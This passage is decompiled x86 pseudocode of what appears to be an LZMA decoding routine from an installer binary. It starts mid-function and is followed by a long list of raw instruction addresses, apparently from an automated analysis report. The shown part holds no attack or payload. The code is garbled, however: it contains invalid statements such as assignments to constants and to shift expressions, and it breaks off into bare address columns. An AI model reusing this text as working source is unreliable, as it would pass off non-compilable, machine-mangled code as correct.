											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                                                    0x00406609
                                                                                                                    0x00406609
                                                                                                                    0x00406609
                                                                                                                    0x00406609
                                                                                                                    0x0040660f
                                                                                                                    0x00406613
                                                                                                                    0x00406617
                                                                                                                    0x00406621
                                                                                                                    0x0040662f
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x0040693c
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406942
                                                                                                                    0x0040694b
                                                                                                                    0x00406951
                                                                                                                    0x00406954
                                                                                                                    0x00406957
                                                                                                                    0x0040695a
                                                                                                                    0x0040695d
                                                                                                                    0x00406963
                                                                                                                    0x0040697c
                                                                                                                    0x0040697f
                                                                                                                    0x0040698b
                                                                                                                    0x0040698c
                                                                                                                    0x0040698f
                                                                                                                    0x00406965
                                                                                                                    0x00406965
                                                                                                                    0x00406974
                                                                                                                    0x00406977
                                                                                                                    0x00406977
                                                                                                                    0x00406999
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x0040699b
                                                                                                                    0x00406914
                                                                                                                    0x00406918
                                                                                                                    0x00406a50
                                                                                                                    0x00406a50
                                                                                                                    0x00406a5a
                                                                                                                    0x00406a62
                                                                                                                    0x00406a69
                                                                                                                    0x00406a6b
                                                                                                                    0x00406a72
                                                                                                                    0x00406a76
                                                                                                                    0x00406a76
                                                                                                                    0x0040691e
                                                                                                                    0x00406924
                                                                                                                    0x0040692b
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406936
                                                                                                                    0x00000000
                                                                                                                    0x00406936
                                                                                                                    0x004069a0
                                                                                                                    0x004069ad
                                                                                                                    0x004069b0
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406061
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00406067
                                                                                                                    0x00000000
                                                                                                                    0x0040606e
                                                                                                                    0x00406072
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406078
                                                                                                                    0x0040607b
                                                                                                                    0x0040607e
                                                                                                                    0x00406081
                                                                                                                    0x00406085
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040608b
                                                                                                                    0x0040608b
                                                                                                                    0x0040608e
                                                                                                                    0x00406090
                                                                                                                    0x00406091
                                                                                                                    0x00406094
                                                                                                                    0x00406096
                                                                                                                    0x00406097
                                                                                                                    0x00406099
                                                                                                                    0x0040609c
                                                                                                                    0x004060a1
                                                                                                                    0x004060a6
                                                                                                                    0x004060af
                                                                                                                    0x004060c2
                                                                                                                    0x004060c5
                                                                                                                    0x004060d1
                                                                                                                    0x004060f9
                                                                                                                    0x004060fb
                                                                                                                    0x00406109
                                                                                                                    0x00406109
                                                                                                                    0x0040610d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060fd
                                                                                                                    0x00406100
                                                                                                                    0x00406101
                                                                                                                    0x00406101
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060d3
                                                                                                                    0x004060d7
                                                                                                                    0x004060dc
                                                                                                                    0x004060dc
                                                                                                                    0x004060e5
                                                                                                                    0x004060ed
                                                                                                                    0x004060f0
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x00406113
                                                                                                                    0x00406113
                                                                                                                    0x00406117
                                                                                                                    0x004069c3
                                                                                                                    0x004069c3
                                                                                                                    0x00000000
                                                                                                                    0x004069c3
                                                                                                                    0x0040611d
                                                                                                                    0x00406120
                                                                                                                    0x00406130
                                                                                                                    0x00406133
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406139
                                                                                                                    0x0040613d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x0040613f
                                                                                                                    0x00406145
                                                                                                                    0x0040616f
                                                                                                                    0x00406175
                                                                                                                    0x0040617c
                                                                                                                    0x00000000
                                                                                                                    0x0040617c
                                                                                                                    0x00406147
                                                                                                                    0x0040614b
                                                                                                                    0x0040614e
                                                                                                                    0x00406153
                                                                                                                    0x00406153
                                                                                                                    0x0040615e
                                                                                                                    0x00406166
                                                                                                                    0x00406169
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061ae
                                                                                                                    0x004061b4
                                                                                                                    0x004061b7
                                                                                                                    0x004061c4
                                                                                                                    0x004061cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406183
                                                                                                                    0x00406183
                                                                                                                    0x00406187
                                                                                                                    0x004069d2
                                                                                                                    0x004069d2
                                                                                                                    0x00000000
                                                                                                                    0x004069d2
                                                                                                                    0x0040618d
                                                                                                                    0x00406193
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x004061a1
                                                                                                                    0x004061a4
                                                                                                                    0x004061a7
                                                                                                                    0x004061ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406891
                                                                                                                    0x00406895
                                                                                                                    0x00406a44
                                                                                                                    0x00406a44
                                                                                                                    0x00000000
                                                                                                                    0x00406a44
                                                                                                                    0x0040689b
                                                                                                                    0x004068a1
                                                                                                                    0x004068a8
                                                                                                                    0x004068b0
                                                                                                                    0x004068b3
                                                                                                                    0x004068b6
                                                                                                                    0x004068b6
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061d4
                                                                                                                    0x004061d4
                                                                                                                    0x004061d6
                                                                                                                    0x004061d9
                                                                                                                    0x0040624a
                                                                                                                    0x0040624a
                                                                                                                    0x0040624d
                                                                                                                    0x00406250
                                                                                                                    0x00406257
                                                                                                                    0x00406261
                                                                                                                    0x00000000
                                                                                                                    0x00406261
                                                                                                                    0x004061db
                                                                                                                    0x004061db
                                                                                                                    0x004061df
                                                                                                                    0x004061e2
                                                                                                                    0x004061e4
                                                                                                                    0x004061e7
                                                                                                                    0x004061ea
                                                                                                                    0x004061ec
                                                                                                                    0x004061ef
                                                                                                                    0x004061f1
                                                                                                                    0x004061f6
                                                                                                                    0x004061f9
                                                                                                                    0x004061fc
                                                                                                                    0x00406200
                                                                                                                    0x00406207
                                                                                                                    0x0040620a
                                                                                                                    0x00406211
                                                                                                                    0x00406215
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x00406221
                                                                                                                    0x00406224
                                                                                                                    0x00406242
                                                                                                                    0x00406242
                                                                                                                    0x00406244
                                                                                                                    0x00000000
                                                                                                                    0x00406226
                                                                                                                    0x00406226
                                                                                                                    0x00406226
                                                                                                                    0x00406229
                                                                                                                    0x0040622c
                                                                                                                    0x0040622f
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406234
                                                                                                                    0x00406237
                                                                                                                    0x00406239
                                                                                                                    0x0040623a
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x00406473
                                                                                                                    0x00406473
                                                                                                                    0x00406477
                                                                                                                    0x00406495
                                                                                                                    0x00406495
                                                                                                                    0x00406498
                                                                                                                    0x0040649f
                                                                                                                    0x004064a2
                                                                                                                    0x004064a5
                                                                                                                    0x004064a8
                                                                                                                    0x004064ab
                                                                                                                    0x004064ae
                                                                                                                    0x004064b0
                                                                                                                    0x004064b7
                                                                                                                    0x004064b8
                                                                                                                    0x004064ba
                                                                                                                    0x004064bd
                                                                                                                    0x004064c0
                                                                                                                    0x004064c3
                                                                                                                    0x004064c3
                                                                                                                    0x004064c8
                                                                                                                    0x00000000
                                                                                                                    0x004064c8
                                                                                                                    0x00406479
                                                                                                                    0x00406479
                                                                                                                    0x0040647c
                                                                                                                    0x0040647f
                                                                                                                    0x00406489
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064dd
                                                                                                                    0x004064dd
                                                                                                                    0x004064e1
                                                                                                                    0x00406504
                                                                                                                    0x00406507
                                                                                                                    0x0040650a
                                                                                                                    0x00406514
                                                                                                                    0x004064e3
                                                                                                                    0x004064e3
                                                                                                                    0x004064e6
                                                                                                                    0x004064e9
                                                                                                                    0x004064ec
                                                                                                                    0x004064f9
                                                                                                                    0x004064fc
                                                                                                                    0x004064fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406520
                                                                                                                    0x00406520
                                                                                                                    0x00406524
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040652a
                                                                                                                    0x0040652a
                                                                                                                    0x0040652e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406534
                                                                                                                    0x00406534
                                                                                                                    0x00406536
                                                                                                                    0x0040653a
                                                                                                                    0x0040653a
                                                                                                                    0x0040653d
                                                                                                                    0x00406541
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406591
                                                                                                                    0x00406591
                                                                                                                    0x00406595
                                                                                                                    0x0040659c
                                                                                                                    0x0040659c
                                                                                                                    0x0040659f
                                                                                                                    0x004065a2
                                                                                                                    0x004065ac
                                                                                                                    0x00000000
                                                                                                                    0x004065ac
                                                                                                                    0x00406597
                                                                                                                    0x00406597
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065b8
                                                                                                                    0x004065b8
                                                                                                                    0x004065bc
                                                                                                                    0x004065c3
                                                                                                                    0x004065c6
                                                                                                                    0x004065c9
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065cc
                                                                                                                    0x004065cf
                                                                                                                    0x004065d2
                                                                                                                    0x004065d2
                                                                                                                    0x004065d5
                                                                                                                    0x004065d8
                                                                                                                    0x004065db
                                                                                                                    0x004065db
                                                                                                                    0x004065de
                                                                                                                    0x004065e5
                                                                                                                    0x004065ea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406678
                                                                                                                    0x00406678
                                                                                                                    0x0040667c
                                                                                                                    0x00406a1a
                                                                                                                    0x00406a1a
                                                                                                                    0x00000000
                                                                                                                    0x00406a1a
                                                                                                                    0x00406682
                                                                                                                    0x00406682
                                                                                                                    0x00406685
                                                                                                                    0x00406688
                                                                                                                    0x0040668c
                                                                                                                    0x0040668f
                                                                                                                    0x00406695
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x0040669a
                                                                                                                    0x0040669d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040626d
                                                                                                                    0x0040626d
                                                                                                                    0x00406271
                                                                                                                    0x004069de
                                                                                                                    0x004069de
                                                                                                                    0x00000000
                                                                                                                    0x004069de
                                                                                                                    0x00406277
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x0040627d
                                                                                                                    0x00406281
                                                                                                                    0x00406284
                                                                                                                    0x0040628a
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628f
                                                                                                                    0x00406292
                                                                                                                    0x00406292
                                                                                                                    0x00406295
                                                                                                                    0x00406298
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040629e
                                                                                                                    0x0040629e
                                                                                                                    0x004062a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004062aa
                                                                                                                    0x004062aa
                                                                                                                    0x004062ae
                                                                                                                    0x004062b1
                                                                                                                    0x004062b4
                                                                                                                    0x004062b7
                                                                                                                    0x004062ba
                                                                                                                    0x004062bb
                                                                                                                    0x004062be
                                                                                                                    0x004062c0
                                                                                                                    0x004062c6
                                                                                                                    0x004062c9
                                                                                                                    0x004062cc
                                                                                                                    0x004062cf
                                                                                                                    0x004062d2
                                                                                                                    0x004062d5
                                                                                                                    0x004062d8
                                                                                                                    0x004062f4
                                                                                                                    0x004062f7
                                                                                                                    0x004062fa
                                                                                                                    0x004062fd
